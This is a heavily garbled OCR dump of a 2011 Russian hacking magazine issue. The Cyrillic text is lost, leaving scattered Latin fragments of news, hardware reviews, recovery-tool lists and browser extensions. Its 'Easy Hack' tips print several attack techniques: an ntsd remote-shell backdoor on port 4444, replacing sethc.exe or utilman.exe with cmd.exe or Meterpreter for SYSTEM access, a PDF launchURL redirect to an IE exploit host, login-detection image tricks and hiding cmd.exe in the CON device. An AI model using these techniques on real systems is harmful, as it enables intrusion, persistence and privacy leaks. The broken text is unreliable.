Вы находитесь на странице: 1из 148

x 09 (152) 2011

.
210
:

GOOGLE CHROME 030

LULZSEC
09 (152) 2011

082

LULZSEC / : , , FOX NEWS



WINDOWS 7

PHPMYADMIN
064

ANDROID 070
152

,
JAVASCRIPT 050

:
, ,
FOX NEWS

CODING
ALEKSANDR-EHKKERT@RAMBLER.RU

X 10 /141/ 10

INTRO


SMS, / -
.
3 5
.
,
: , 1,
FM, BBC

:).

, ,
. : sms

, cybercrime .
,
?

.
, ,
,
, - :
.
-
.
,

2015 ,
. ,
,
Google-hack .
nikitozz, . .
vkontakte.ru/xakep_mag

Content

MALWARE

MegaNews

004

Ferrum
016
020
021

Corpus vulgaris

PRO!
QNAP TS-459 Pro II

PC_Zone
027
028
029
030
036


,
Proof-of-Concept

SQL- 100

Live-

- Google Chrome
Google

UI- Windows 7

040

Easy-Hack

044

050

JavaScript:

,
-

Google

064

OWASP AppSec Europe 2011:


?

082

088

Pwnie Awards 2011

hacker tweets
-

phpMyAdmin

X-Tools

: RedEye, Crutop, Fethard Chronopay


LulzSec

: ?

092

098

38

102

Android-

106

Windows Phone 7.1

110

, !

114
118

-
Python

SYN/ACK
122
128

Forefront Endpoint Protection:

132

Windows

!
,

PHREAKING
136

068

076

063

wepawet

060

073 Drive-by-Download -

+5

056

Samsung S27A750D

022

070 Android-


iButton

140
143
144

FAQ UNITED
FAQ

8.5

WWW2

web-

022

070

Android-

136

iButton

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
PC_ZONE UNITS
step
(step@real.xakep.ru)

(magg@real.xakep.ru)
, MALWARE SYN/ACK
Dr. Klouniz
(alexander@real.xakep.ru)
UNIXOID PSYCHO
Andrushock
(andrushock@real.xakep.ru)
PHREAKING
(po@kumekay.com)
>

> DVD

Step
(step@real.xakep.ru)
Unix-
Ant
(antitster@gmail.com)
Security-
D1g1
(evdokimovds@gmail.com)


>PR-
(grigorieva@glc.ru)

> xakep.ru
(xa@real.xakep.ru)

/ART

>-
(alik@glc.ru)
>

/PUBLISHING
>
, 115280, , . ,19, , 5 , 21
.: (495) 935-7034, : (495) 545-0906
>

>

>

>

>

>

>

.: (495) 935-7034, : (495) 545-0906

> TECHNOLOGY
(komleva@glc.ru)
>
(olgaeml@glc.ru)
(alekhina@glc.ru)

>
(polikarpova@glc.ru)
>
, birarova@glc.ru
>
( )
(tatarenkova@glc.ru)
>
(ilk@glc.ru)
(goncharova.n@glc.ru)
>
(yakovleva.s@glc.ru)
> -
(alekseeva@glc.ru)
> MAN TV

: 8-800-200-3-999
>
101000, , , / 652,

,

77-11802 14.02.2002
Zapolex,
.
219 833 .

>

>


.

. ,
,
.


.
.


:
content@glc.ru

, , 2011

>
(kosheleva@glc.ru)
>
(lukicheva@glc.ru)
> :
DVD-: claim@glc.ru.
>

: (495) 545-09-06

: (495) 663-82-77

MEGANEWS
Mifrill (mifrill@real.xakep.ru)

Meganews

,
. , -

, 20- .
Whisper Systems (www.whispersys.com)
( )
Android. :
-
Google.
WhisperCore -,
Nexus S (3G) Nexus One,
, . .
.
:
.
. WhisperCore,
, .
,
. , -
IMEI , ,
.
,
GPS- . SD-,
WhisperMonitor,
,
FlashBack, ,
.

6 10 Adobe Reader , ,
Avast.

,

, ,
, - .
. , ,
, GScreen.
GScreen SpaceBook 17- ,
19201080 . , . ,
: 10 ,
4,54 ! ,
. ,
. Intel Core i5560M 2,66 , 4 DDR . ,
, Intel Core i7-740QM (1,73 )
(8 ). -

004

: $2395 $2795 .
50% .
X 09 /152/ 2011

WEXLER.HOME 903


, ( ,
). , , .
handycraft' , . ,
, .
.
WEXLER.HOME 903 64- Windows 7
, .

. , , ,
.

. WEXLER.HOME
750 . ,
, .

WEXLER.HOME 903 Windows 7 .


64- :
4 .
, Microsoft
Security Essentials Office 2010 Starter ( Word Excel, ).

Intel Core i5-650 3,2 - 4 . CPU



Turbo Boost, (, ). , .

GeForce GTX 460,


Fermi.
DirectX 11 GTX 460 , NVIDIA 3D
Vision, PhysX CUDA
, .
.

WEXLER.HOME 903
4 , .

Windows 7.

WEXLER
Wexler:
+7 (800) 200-9660
www.wexler.ru
Microsoft Windows 7, / ,
Microsoft.

MEGANEWS



,
, , ,
. .
( , 12-
). , ,

,
, Malware
-,
deeonis.
, : . ,
.
, ,

, .
, .
. , ,
/Livejournal/Facebook
. ,

Deeonis - VPN!
SmartHide, , !.
, , , deeonisa
. :
, - .
Stuxnet, ,
, ,
, . ,
:).
Microsoft, .
, . ,

: ,
Apple, . , . ,
, , ,
,
:).

.
, : -
, .
, .

Microsoft $250 000


, Rustock.

... IPHONE
. , iPhone Apple ,
.


,
,

,


,

.
,
,
, .
, , -

006

, , . Photojojo
,

SLR- Canon
Nikon iPhone.
,
- Canon
Nikon.
: iPhone
3/3GS $190, iPhone 4 $249.
, . .

X 09 /152/ 2011

MEGANEWS

WEXLER.SUN
Wexler. WEXLER.SUN
, .
,
,
.
, , , MP3/MP4-, , .
,

USB- 220 .
.
(90x40x8,5 , 45 ) , .
890 .

.
47,83% ,
G Data.
(47,29%), (47,23%) (45,4%).

Microsoft. Microsoft Malware Protection Center (MMPC)


Popureb,
.
, ,

008

, Windows
.
Trojan:Win32/Popureb.E,
, - ,
, , . ,
, , , Microsoft .
,

TDL-4 ( TDL-3, Alureon
TDL). 2011
4,52 ,
. TDL-4
20 -,
ZeuS, Gbot Optima.
,
. Popureb, TDL-4 . ,
64- Windows.
, TDL
, ,
. ,
, , .
, 50%
, TDL-4 .
, TDL ,
TDL-4 . 20-200 1000 ,
.
, , (
, !).
X 09 /152/ 2011

MEGANEWS

,
, .
... , .

Food Not Bombs.


, ,
, . :
. Anonymous - .
DDoS- .
Orlando Florida Guide,
.
AntiSec
. , IRC Federal
, ,
, ,
.
, ,
. Pastebin,
SQL-. IRC Federal ,
.
. The Pirate Bay
107 , .

11 .co.cc Google - ,
.



.
,
. , -
. ,

. ,
, ,

010

. ,
2012 , ,
. -, ,
, . . ,
.
X 09 /152/ 2011

MEGANEWS

WP7 MANGO

Microsoft Mango
Windows Phone 7.
. : Mango ,
, . , Mango IE 9 HTML 5 -. ,
Skype Windows Phone 7.
Microsoft , (, Twitter Facebook),
- .
- Worldwide Developer
Conference 2011 Windows Phone 7.1 Mango. Acer,
Fujitsu, ZTE Samsung. ,
, Microsoft
, $100-150.
,
, . ,
,
, .

McAfee
- ..
8 .


Apple
, ,

Apple .
,
, .
,
Dev-Team (jailbreakme.
com, ) .
, iOS
. Apple
ASLR (Address Space Layout Randomization)
. PDF.
Apple , : ,
iOS. Dev-Team
, , PDF Patcher 2,
. ,
,
,
.


.

012

X 09 /152/ 2011

,
,


. ,

. AT&T, Verizon, Comcast,
Cablevision Time Warner Cable
, ...

, . -
(
), IP- . , , IP
.
, . ,

- . , . ,
-
, .
.

,
, Edifier.
MP250 ,

. ,

, MP250 , . ,
,
. MP250

USB- . ,
, ,
: 261 x 36
x 44 (xx), : ~0,33. ,
MP250
- .
-: 3 1,25
, 5 , - -: 4 1,25
. : RMS 2
x 2W . -: >75 (A).
: ~1 %. ,
MP250
, Reddot design award winner 2011,
IF Product design award 2011 Innovations
International CES.

2011 I
!. 5 55 ,
. . ? - I
www.petr-1.ru SMS 5206.
, -, MP4- DVD-.
, 100 .
.

X 09 /152/ 2011

15 2011 . 15 2012 .
15 2011 2 2011 . www.
petr-1.ru sms 5206. , , , , ,
SMS www.petr-1.ru
, 18 .

Samsung Galaxy S II . 55
3 . Galaxy S
85 .

MEGANEWS


,
,
, . . 13 ,
,
,
. , .
. ,
, .
, , , , . ,
,
, ,
.
IPTP Networks, RETN
.
, , , , ,
. , -, .

, - ,
- ,
. , ,
.
? - .

5,14
AMD FX-8130P 3,8 Bulldoze.
.

SAFETY AND SECURITY CENTER


Microsoft Safety and
Security Center, , , . ,
, ,
. ,

VSFTPD

014

porn streaming. ,
. Microsoft

, . ,
, .

FTP- vsftpd
,
. vsftpd-2.3.4.tar.gz .
. shell TCP- 6200,
FTP- , .
,
. ,
.
, , .
, ,
Google App
Engine.
, .
: , . - .
X 09 /152/ 2011

#GOOGLE

Android,
Chrome Google+

$9,03

28,768

>160

$6,23


+1 .

500 000


2011
,
.

$2,48

AdSense.

$2,11


(

).


Google .

Android
.

130

Android
.

Android
Market .


Google Chrome.

2,3
$20

Google+.

10

Google+
. 1,3%
Facebook.


90 eBay.

SKYPE
Skype ,
.
,
. Skype Microsoft $8,5 , , ,
. , 2009 ,
Skype, Microsoft
(Legal Intercept),
, Skype
VoIP-. ,
,
,
.
: ,
, , . ,
(POTS), VoIP , , .
.
X 09 /152/ 2011

015

FERRUM

CORPUS

VULGARIS


.
, .
,
,
.


, . : ,
.
:
, , ,
, ,
, .
. 200
.
, .


,
( ), .
. , :
.
,
.
LinX.
FurMark. , HDD
AIDA64 Extreme Edition.
20 , .

016

:
:
ASRock 890FX Deluxe3
:
AMD Phenom II 970, 3500
:
Zalman CNPS 10X Extreme
:
Corsair Dominator GT 2000 , 4
:
SAPPHIRE Radeon HD 6970
:
Western Digital WD2001FASS, 2
:
FSP Epsilon, 700
:
Windows Vista x64

X 09 /152/ 2011

4700 .

4200 .

Aerocool Xpredator
Evil Black Edition

Antec DF-35

-: mATX, ATX Flex ATX, E-ATX, XL-ATX


:
5- : 6
3,5- : 6
: 2230
:
: 4USB 2.0, 1eSATA, ,

-: Mini-ITX, mATX, ATX


:
5- : 3
3.5- : 6
: 3120 , 1140
:
: 2USB 2.0, ,

230-
, .
, . ,
.
. , PCI-
.
.
. , Aerocool Xpredator Evil Black Edition
.
- . ,
.

Antec
.
DF-35, .
,
, . Antec ,
.
- , . ,
.

. , Antec
SSD.
2,5- .
Antec DF-35 -,
.
.
. ,
. Antec DF-35 .
, , , .
, -
.
, Antec ,
.

X 09 /152/ 2011

017

FERRUM

3500 .

5700 .

Corsair 600T

GIGABYTE Cupio 6140

-: mATX, ATX
:
5- : 4
3,5- : 6
: 1120 , 2200
:
: 4USB 2.0, 1xUSB 3.0, 1IEEE1394,
,

-: mATX, ATX
:
5- : 5
3,5- : 5
: 2120
:
: 2USB 2.0, 1 eSATA, 1xFireWire, ,

Corsair
.
. ,
, . ,
, .
,
. Corsair 600T
. -- .
.
,
.
: ,
. ,
, . ,
.
, .
Corsair 600T, , ,
. ,
.

GIGABYTE.
.
.
GIGABYTE Cupio 6140 .
, , . - . , . ,
. . ,
.
, .
, , , .
.
.
USB 2.0 eSATA, FireWire, -
.
.
, , . ,
, , ,
- .

018

X 09 /152/ 2011

10000 .

5600 .

SilverStone Raven 2

Thermaltake Level 10 GT

-: mATX, ATX, SSI CEB


:
5- : 5
3,5- : 5
: 1120 , 3180
:
: 2USB 2.0, ,

-: mATX, ATX, E-ATX


:
5- : 4
3,5- : 5
: 1200 , 1140
:
: 2USB 3.0, 4xUSB 2.0, 1eSATA, ,


.
, . , .
. .
.
.
,
, - .
,
,
,
.
, , . ,
.
, .
, , ,
SilverStone Raven 2 , !
.

, .
X 09 /152/ 2011

Thermaltake Level
10 GT. ,
BMW.
.
(12,7 ). ,
.
Thermaltake Level 10 GT , . , (
, ). . ,

.
molex-. Thermaltake Level 10 GT
,
, , .
, .
Thermaltake Level 10 GT, . ,
, .

.
SilverStone Raven 2, -
, - , . z

019

FERRUM


Samsung S27A750D
:
: 27"
: 1920x1080
: TFT TN
: 300 /2
: 1000:1
: 2
: HDMI, DisplayPort,


. .
,
. 27-
?
, .

Samsung S27A750D.

, 27 .
, , , , .
Samsung S27A750D , ,
.
.

. , , , .
, Samsung S27A750D . ,
, : HDMI DisplayPort. ,
- 3D-
HDMI-.

, ColorVision Spyder 3 Elite.


: , RGB. ,
, ,
. , , .
sRGB. , ,
.

HD- . , (CCFL).
, , . , , ,
CCFL, .
, .
! . , . - , ,
2 ,
. 3D.
,
Bluetooth. , ,
. , ,
, Samsung S27A750D
3D-, 2D-,
.

, - , . :
Full HD, , ,
Samsung S27A750D.
- , , ,
.
+ 2D 3D .
- .
z

. , Samsung S27A750D . 19801080 . ,

020


X 09 /152/ 2011

FERRUM

39 000 .

PRO!

QNAP TS-459 Pro II

NAS, ,
. QNAP
, ,
.
Citius, Altius, Fortius!

NAS, , . QNAP TS-459 Pro II Intel Atom D525,


1800 . , Atom .
Hyper Threading
. 1 DDR3.
.
, QNAP TS-459 Pro II
, : 3 . ,
QNAP SATA 3.0. , , QNAP TS-459 Pro II
: , TS-459 Pro
DDR3 ( DDR2).
QNAP . ,
RJ-45,
,
Multi-IP. , QNAP TS-459 Pro II
USB eSATA.
USB 3.0,
.
X 09 /152/ 2011

, , Wi-Fi- USB-.
QNAP TS-459 Pro II
: 19 35
.

, , .
.
, ,
. , 3.4 RAID 10, RAID 0 RAID 1. RTRR (Real-time Remote Replication),

. ,
Amazon S3
ElephantDrive. ,
QNAP : www.qnap.ru.

QNAP TS-459 Pro II


, : , ,
iSCSI . z

021

PC_ZONE


,
:).
,
. .

,
, ,
. ,
, . ,
.
, . :
1. (<shift+del>) .
2. ( ).
3.

( ).
, ,

022

.
dd. , -,
sudo dd if=/dev/zero of=/
dev/sdb1 bs=512 count=1 conv=noerror (sdb1 ,
). -,

sudo dd if=/dev/zero of=/dev/sdb1
bs=512 count=1 seek=n conv=noerror
n, n 1 511968
(511968 ). ,
. 16
: 6 3 .

, . .

X 09 /152/ 2011

UFS Explorer Recovery


: Windows, Linux, BSD, Mac OS X
: NTFS, FAT, Ext2, Ext3, Ext4, XFS,
FFS, HFS, HFS+
: ( )
: 21,95 129,95
: www.ufsexplorer.com

R-Studio
: Windows
: FAT12/16/32/exFAT, NTFS, HFS/
HFS+, UFS1/UFS2, Ext2/Ext3/Ext4
: ( )
: $79 $179
: www.data-recovery-software.net

R-studio , .
.
,
, . , R-Studio -
, . ,
,
- .
R-Studio
,
RAID-.
RAID ,
. -
,
.
.
R-Studio ,
,
. .
$79,
$49 ,
FAT NTFS.
, , .

INFO

info
,

(,
Photo Recovery Genius,
DiskInternals Flash
Recovery). , ,

,
, ,
. !


.

, ,
. UFS Explorer Recovery
R-Studio: Mercedes S-,
, .

- , XFS.
? . ,
? , :
NAS
.
R.Studio, , : UFS Explorer
. , .
. UFS Explorer
Recovery
standard, professional raise data recovery.
39,95,
49,95 21,95. , professional
. standard RAID-
.vim- ( ).
( ) raise data recovery

( raise).
:
, ,
RAID .vim-, , .
: .

:
, ,
RAID, , .
: .

X 09 /152/ 2011

023

PC_ZONE

File Scavenger
: Windows
: FAT, NTFS
: ( )
: $49,95
: www.quetek.com

RecoverMyFiles
: Windows
: FAT, NTFS, HFS, HFS+
: ( )
: $69,95 $299,90
: www.recovermyfiles.com


File Scavenger
.

. , , File Scavenger. RecoverMyFiles

Windows Mac OS X,
EXT2 EXT3. ,
$69,95.

DVD
dvd


,

.

, . File Scavenger 1 , . ,
. File Scavenger
.
. :
. , .

.
RAID-.
,
.
File Scavenger $49,95.
: , RAID, ,
.
: .

: , RAID, .
: , .

024

1. ( )! .
, .
2. ,
. . .
3. , , ,
. .
, .

X 09 /152/ 2011

GetDataBack
: Windows
: FAT, NTFS
: ( )
: $69-$79
: www.runtime.org

:
GetDataBack ,
, . .
.
.
,
. , , GetDataBack
,
, .

.
NTFS FAT, $79 $69 .

EasyRecovery
: Windows
: FAT, NTFS
: ( )
: 6458 .
: www.easyrecovery.ru

EasyRecovery . , . EasyRecovery
FAT
NTFS,
. . -,
( ), -, MS Office zip-.
Raw Recovery.
EasyRecovery .
,
, .
, , ,
. ,
6 .

: ,
.
: .

: , ,
MS Office zip-.
: , .


R-Studio
UFS Explorer Recovery
EasyRecovery
File Scavenger
RecoverMyFile
GetDataBack
Stellar Phoenix
R.Saver
X 09 /152/ 2011

+
+
+
+
+
+
+
+

+
+
+
+
+
+
+
+

+
+
+
+
+

$79 $179
21.95 129.95

$230 $3300
$49.95
$69.95 $299.90
$69 $79
$49
Free

Recuva
PC INSPECTOR File Recovery
Restoration
Undelete Plus
FreeUndelete
Avira UnErase
Roadkils Undelete
Avira UnRase

+
+
+
+
+
+
+
+

+
+
+

Free
Free
Free
Free
Free
Free
Free
Free

025

PC_ZONE

Recuva

R.Saver

: Windows
: FAT, NTFS
: ( )
: www.piriform.com/recuva

: Windows
: FAT, NTFS
: ( )
: rlab.ru/tools/rsaver.html


, . , -, . Recuva
, .
. ,
, .
.

.

R.Saver ,
. , ,
UFS Explorer Recovery. , .
. R.Saver

FAT NTFS. ,
: Apple Mac OS
(HFS, HFS+/HFSX), Linux (Ext2, Ext3, Ext4, ReiserFS, JFS XFS) .. ,
RAID-
, R.Saver . .

: .
: .

: .
: .

PC INSPECTOR File Recovery


: Windows
: FAT, NTFS
: ( )
: www.pcinspector.de

, Recuva,
. , ,
.
PC INSPECTOR Smart Recovery,
.
: .
: .

, : ?. .
R-Studio UFS Explorer Recovery. .
, . , R.Saver . , . z

026

X 09 /152/ 2011

PC_ZONE
(unconciousmind.blogspot.com)

Proof-of-Concept
SQL-
100


,
:
?.

sqlmap (sqlmap.sourceforge.net),
,

SQL- .

SQL (,
')
)
( AND 1=1)
,
.

,

DBMS,
.
,
?

98 DSSS

X 09 /152/ 2011

? ,
,
, 100 ,
, ,

.
, , . Damn Small
SQLi Scanner (DSSS), Python. ,
98 .

, (SQL poisoning),
DBMS (MySQL, Oracle, PostgreSQL,
Microsoft SQL Server ..),

.
,
, HTTP (200, 404, ..), (
Python- difflib). ,
.
Damn Small SQLi
Scanner (github.com/stamparm/DSSS),

. ,
, ,
- . z

INFO

info




DVD-.

Damn Small SQLi Scanner


SQL-

027

PC_ZONE
Step (twitter.com/stepah)
twitter.com/stepah

, Windows 7
.
: ,
,
:). ,

, (
),

. ( ),
.
. .
,
, ,

,
NTFS. .
Win7PE
. : ? ,
Win7PE, Backtrack - ?
- .

grub4dos grubinst
(download.gna.org/grubutil)
menu.lst,
ISO-.


:
YUMI (www.pendrivelinux.com);
SARDU (www.sarducd.it);
XBOOT (sites.google.com/site/shamurxboot).
GUI,

. , ,
XBOOT.
1.
.
dragndrop-
ISO,
Create
Multiboot USB/ISO.

(,
):
,
,
, ,
(Linux, Utility
..). , Offline NT Password & Registry
Editor Backtrack

. -
.
2. .

, XBOOT .
,
PE, MSDART, ERD (Windows Vista
& 7 only.). , ,

Add using
Grub4dos image Emulation.
.
3. ISO

.
(), (Syslinux, , Grub4Dos).
.
,

QEMU,
XBOOT.
, ( !)
.

-
syslinux.cfg.
4. , , .
- VMware/
QEMU/VirtualBox, ,
.
:
,
.
multibootable-

FAT32. NTFS Linux .
FAT32,

RPprepUSB tool (sites.google.com/site/
rmprepusb), 2 .
. XBOOT
.NET
Framework 4.
,
PGK.Extensions,
dll- dnpextensions.
codeplex.com
%windir%/system32.
,
,
.
.

QEMU

028

X 09 /152/ 2011

PC_ZONE

, , . ,
.
Live .

F-Secure Rescue CD
Norton Bootable Recovery Tool
Avira AntiVir Rescue System
Kaspersky Kav Rescue CD
Panda Safe Cd
AVG Rescue CD

CloneZilla

Norton
Ghost ,

.

Parted Magic/
GParted
,
,

,

.

PING (Partimage Is
Not Ghost)
LiveCD-,

,
,

,
.

SystemRescueCd


.

Ophcrack Live

LM/NTLM
Windows

.

Offline NT Password
& Registry Editor

,

- Windows
-
, .

Kon-Boot
, ,

,

Windows Linux,
.

X 09 /152/ 2011

Magic Boot Disk


MHDD




.

Trinity Rescue Kit


Windows-,
5 .

Redo Backup Live CD


,

.

YLMF

,

Live-,

Linux,
Windows
XP

Wine.

Memtest86+


,
RAM,

.

BitDefender Rescue CD
Dr.Web LiveCD
eScan Rescue Disk
GData AntiVirus Emergency System
Acronis Antimalware CD
Ubuntu Malware Removal Toolkit

netboot.me
,



,
.

NetBootCD


Linux
.

Ultimate Boot CD
100
,


.

Inquisitor Live
,


.

Dariks Boot
And Nuke
!



,
(
) .

Tails

Tor-.

029

PC_ZONE
Step (twitter.com/stepah)

-
Google Chrome



Google

Google Chrome,
,
. !
, ,
. ,
.
030

X 09 /152/ 2011


Fingerprinting

Wappalyzer bit.ly/oTIa1K

, -. - , -
, , ( ) .

Firefox,
, , . , ,
,
.
CMS//
, . , <meta name=generator
content=WordPress 3.1 />
, WordPress. Wappalyzer, .
Wappalyzer
, , ,
-, .

Web Server Notifier


bit.ly/nKwZm4


( ) , -,
. Apache, IIS,
Nginx, GWS, Lighttpd -
-, Web Server Notifier
.

X 09 /152/ 2011

Chrome Sniffer
bit.ly/qIVfbx

Chrome Sniffer Wappalyzer


fingerprinting

, JS.
100 .


.

Web Technology Notifier


bit.ly/nDL6yl

, -:
Ruby, PHP, ASP.NET - ? Web
Technology Notifier
fingerprinting. ,

: ,
Phusion Passenger Ruby
Zope Python.

IP Address information
bit.ly/o93jXj


WHOIS . , ,
,
IP Address information. , WHOIS,
-,
DNS, , ( )
( ,
).

HTTP Headers
bit.ly/plI977



,
HTTP (, X-Powered-By
Server).
,
HTTP Headers.

031

PC_ZONE

HTTP-

, ,
. , ,
-, HTTP-, -, -,
, , , -,
.

Request Maker bit.ly/oRVhVW

Firefox Tamper Data,


HTTP/HTTPS-, POST-.
Google
Chrome , Request Maker .
,
-, URL, ,
POST-,
. , Request Maker , ,
HTML- XMLHttpRequests,

CSS-.

HTTP Response
Browser bit.ly/
oWvHIP

,
Request Maker,

HTTP- ( XMLHttpRequest,
).


.

Advanced REST client


Application bit.ly/pXo2Yb

,
, Chrome-
(, ).
HTTP Response Browser,
HTTP-. Advanced REST client ,

JSON XML ,
HTTP- ( +
) . , ,
JSON XML-.

- , .
, ,
(--) . , Chrome, , . .

Edit This Cookie bit.ly/pLCa0N

,
. Edit This Cookie,
,
.
: ,
,
.
Read-Only-,

.

032

Swap My Cookies bit.ly/ojcXXU


. ,
Swap My Cookies. , .

, ,
.
.
X 09 /152/ 2011

Web Securify
bit.ly/rbIxuQ

, . , Websecurify,

.

Chrome.

, SQL Injection, Cross-site
Scripting, Cross-site Request Forgery,
Local/Remote File Include ..
.

Anti XSS bit.ly/o78fKn


, XSS, ,

.
, ,

.

X 09 /152/ 2011

Google Chrome ,
XSS-, SQL-, . , ,
( ).

XSS Rays bit.ly/qZwexS


, XSS, XSS , . Scan


(
). , ,
?
Reverse
, .

-.

Firebug lite for Chrome


bit.ly/ogdqzj

-, Firebug lite.
,
, - Google Chrome.
, , Firebug lite
JavaScript-,
JS-.

, ,
HTML-,
CSS .
Inspect:
, Firebug lite
, .

iMacros for Chrome


bit.ly/p6Eua9


- ,

.
,
.

, Firefox, Chrome.

033

PC_ZONE

,
. : (
, ),
, ,
.

NotScripts
bit.ly/py5Wyy

IP-
bit.ly/n2c0C3

KB SSL Enforcer
bit.ly/n1YRw2

Proxy Switchy!
bit.ly/pNtr9V

Tampermonkey
bit.ly/qXeLGm

Click&Clean
bit.ly/qlwAQP

,
NoScript Firefox,
.

, ,
XSS Clickjacking :).


.
-
. ,
:
URL
-. ,
- Pandora,
,
.

034

, , . What is
my ip adresse IP-,
, ,
.

,
Greasemonkey,
JS-,
.
Tampermonkey 90%
Chrome,
,
Greasemonkey. ,
- ,
.

userscripts.org.

,
.
SSL,

. KB SSL Enforcer ,
SSL-
, .


- ,
.
, : Flash-cookies,
LSO-
(Local Shared Objects), Silverlight,
Java. Click&Clean ,
,
. ,
.

X 09 /152/ 2011

PC_ZONE

UI-
Windows 7
+5

,
,
. ,
- ,
.

DVD
dvd





.

- , ( Windows Explorer)
, . ,
- ,
.
? , .

QTTabBar

Listary

qttabbar.wikidot.com
,
, . , , -
Microsoft. QTTabBar,
Windows Explorer,
, .
, , ,

, , .

www.listary.com
, ,
. Listary.
Findas-you-type. Windows Explorer .
,
.
?, *.
, : , , smart- ( cmd.exe ,
..).

036

X 09 /152/ 2011

TeraCopy

HashTab

www.codesector.com/teracopy.php

TeraCopy. - Total
Commander, ,
. .
,
TeraCopy. . ,
,
/ ,
.

beeblebrox.org

,

.
,
,
.
,

, HashTab.
must have!

Windows 7, ,
. , ( ),
Microsoft. , . .

Windows 7 Taskbar Items Pinner

Bins

www.door2windows.com
, , , ( exe-).
-
.
, ,

, .

www.oneupindustries.com/bins
,
.
Bin .
dragndrop-
.
,
.

X 09 /152/ 2011

037

PC_ZONE

SuperbarMonitor

Gmail Notifier Plus

superbarmonitor.de
Windows 7
.
SuperbarMonitor

, ,
.. .

bit.ly/71CVn2
Windows7

GMail ( ). ,
Inbox,
.. Jump List.

, , , . , .
, ,
. , , . .

Launchy

multibar

www.launchy.net
, ,
, .
Spotlight Mac OX,
,
. Launchy
. (
<Ctrl>+<Space>),
.
, Launchy
. <Enter>. Launchy
, , , . ,
(,
SSH- PuTTY ).

www.ticno.com

. , ,
multibar. ,
,
. - ,

.



:

multibar.

( ) .

JumpPad
http://bit.ly/pMeUBH
Mac OS X Lion
Launchpad. , JumpPad,
. ,
, ,
- . , ,
. ,

.

038

X 09 /152/ 2011

Windows 7,
. , . , .
, . ? - .

Desktops

360desktop

Fences

bit.ly/dHzGj8
, , -
.
, Microsoft
Desktops ( ,
, Windows).
Desktops
. ,

.

www.360desktop.com


,
.
, ,
,

, .
, ,
.

www.stardock.com/products/fences
,
. , ,
: ,
, , .
, . Fences
, .
,

. ,
,
. Fences
:
,
.

, , . ,
, , - .

Switcher

Acer Gridvista
bit.ly/qrSL2q
,
, drag & drop
.
, Acer. ,

, .
,
, , .
X 09 /152/ 2011

insentient.net
Switcher . ,
. ,
Mac OS X. ,
,
.

eXtra Buttons
www.xtrabuttons.com
,
(,
, )
9 ,
, ,
( ).

039


GreenDog (agrrrdog@gmail.com)

Easy Hack
1

:

WINDOWS.

:
. , ,
. :). , , :
ntsd --server tcp:port=4444 calc.exe

NTSD Microsoft NT Symbolic Debugger, , .


%Windows%\system32. ntsd
(calc.exe),
. -server ,
4444 (tcp:port=4444).
. ,
netcat , ntsd:
ntsd -remote tcp:server=192.168.138.128,port=4444

, -remote
,
4444.
:

:
SYSTEM, .

:
Windows. -
,
, . ,
,
.
. , ,
.
? .
1. LiveCD
. ,
,
%Windows%\system32\config.
2. - ,

040



.shell

! , .
, ntsd
Windows 7 2008.
MS .

Windows , , . , ntsd
.

. sethc.exe, untilman.exe. ,
? :). %Windows%\
system32, cmd.exe,
exe Meterpreter MSF, - (
).
3. .
:). <Shift> sethc.exe, . <Win+U> ( )
untilman.exe, .
4. , cmd.exe,
. . : NT AUTHORITY/SYTEM,
.
5. , meterpreter.

, .
:
100% WIN!
X 09 /152/ 2011

DVD

dvd

: ,
.

src="https://mail.google.com/mail/photos/img/photos/
public/AIbEiAIAAABDCKa_hYq24u2WUyILdmNhcmRfcGhvdG8qKDI1
ODFkOGViM2I5ZjUwZmZlYjE3MzQ2YmQyMjAzMjFlZTU3NjEzOTYwAZwS
Cm_MMUDjh599IgoA2muEmEZD"
/>

:
EasyHack
, , , .
, .
, .
. , (Gmail,
Twitter, Facebook ..) ? Mike Cardwell (goo.
gl/FIO8a) . , , .
, (404,
500 ..), (200).
.
.
Gmail,
,
:
<img style="display:none;"
onload="logged_in_to_gmail()"
onerror="not_logged_in_to_gmail()"

:
, PDF.

:
.
, ,
, Chrome. ?
, ,
IE ,
,
.
, IE . ,
,
PDF- IE. PDF- :

, . , onload ,
, onerror (
). Gmail. ,
,
html-.
<script type="text/javascript" src="https://twitter.com/
account/use_phx?setting=false&amp;format=text"
onload="not_logged_in_to_twitter()"
onerror="logged_in_to_twitter()"
async="async"
></script>

IE Opera, , onload
.
? , .
. , ,
- :).

,
PDF, PDF, Acrobat Reader,
( IE).
: bit.ly/pSuNmj. , , PDF
, ,
.

app.launchURL("http://exploit-for-ie.com/",true);

. Acrobat Reader
, .
API- URL .
.
X 09 /152/ 2011

FireFox PDF IE

041

:
HTTPS.

:
, HTTPS , (
), (
). , ,
SSL ( 3 TLS), . ,
HTTP , , HTTPS,

, .
- . , HTTPS
.
, ,
.
,
. , ,
. ,
, . ,
, , URL
. ,
, . :).
, ,
,
, .
,
: , W-Fi
Man-in-the-middle-. HTTPS, ,
. ?
, Secure
Cookie.
HTTPS.
, ,
.
1. . ,
HTTPS, , HTTPS.
, ,

:
.

:
Session_Fixation
(bit.ly/nMswUp). , ,
.

. -, ,

.
-, . ? ,

042

, Secure,
Domain
.
, . ,
.
2. . ,
-
. . ,
, 80 https- ,
443 . .
HTTP- . -,
iframe () ,
(80 ). , iframe,
.
,
21, 22, 25, 110,
(,
Firefox) .
, Secure
. ?
-, ,
. -,
-. , Apache Tomcat 6.20
Secure .

.
:
1) .
2) .
3)
,
.
4) .
5) ,
.
,
. HTTP,
HTTPS.
WebGoat OWASP (bit.ly/jeqeOF). -
.
X 09 /152/ 2011

:
WINDOWS.

:
, :). , .
? , .
,
.
DOS , ,
(, ,
, :). backward
capability Windows. ,
CON, AUX, COMx, NUL, PRN, LPTx, CLOCKx ( x
1 9). , , .
, , .
/ .
. ,
:
Copy file.txt \\.\c:\CON

,
. file.txt.
CON . , .
Copy \\.\c:\CON file.txt

,
exe. , CON cmd.exe:
X 09 /152/ 2011

copy c:\windows\system32\cmd.exe \\.\c:\CON

,
CON-cmd.exe:
wmic process call create \\.\c:\CON

, Windows XP 7.
- ,
. ,
. z

043


iv (ivinside.blogspot.com)
pikofarad (115612, . , .1)

, !
,
. ,
. -
, , , ,
,
. ,
.

01

MS Office 2010 RTF Header Stack


Overflow Vulnerability Exploit

CVSS V2 BASE SCORE:

9.3 (HIGH)

(AV:N/AC:M/Au:N/C:C/I:C/A:C)
BRIEF
: 3 2011
: Snake
CVE: CVE-2010-3333
Microsoft Office XP SP3, Office 2003 SP3,
Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac
2011 and Open XML File Format Converter for Mac ,
RTF-.
